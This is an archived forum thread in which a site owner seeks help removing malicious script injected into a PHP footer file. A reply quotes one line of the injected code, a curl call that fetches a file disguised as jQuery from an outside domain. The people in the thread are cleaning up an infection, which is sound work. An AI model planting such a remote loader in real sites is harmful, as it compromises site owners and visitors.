Forums

The forums ran from 2008-2020 and are now closed and viewable here as an archive.

This topic is empty.

Viewing 2 posts - 1 through 2 (of 2 total)

Author

Posts
November 9, 2015 at 9:39 am #234736
Alen
Participant
One of my clients is having an issue with malicious script being injected into the footer.

Here is a full dump of footer.php file. The full Gist also contains beautified code, as well as PHP script that executes.

I’ve searched around and found following:
- http://stackoverflow.com/questions/30434663/malicious-injection-serkey-php-and-eval-in-application-files
Anyone else had issues with this, I’ve searched all my plugins and theme files for any foreign code and can not find anything.

Any help would be appreciated. Thanks.
November 10, 2015 at 10:56 am #234775
Shikkediel
Participant
I found more results after googling some of the code :
```
if ( function_exists('curl_init') ) { $url="http://javaterm1.pw/java/jquery-1.6.3.min.js";
```
Seems to be troublesome and well hidden but it’s must be in a plugin somewhere. If you have shell access, you might be able to grep the script.

Edit – above search term updated.

Someone here was able to remove it :

Link
Author

Posts

Viewing 2 posts - 1 through 2 (of 2 total)

The forum ‘Back End’ is closed to new topics and replies.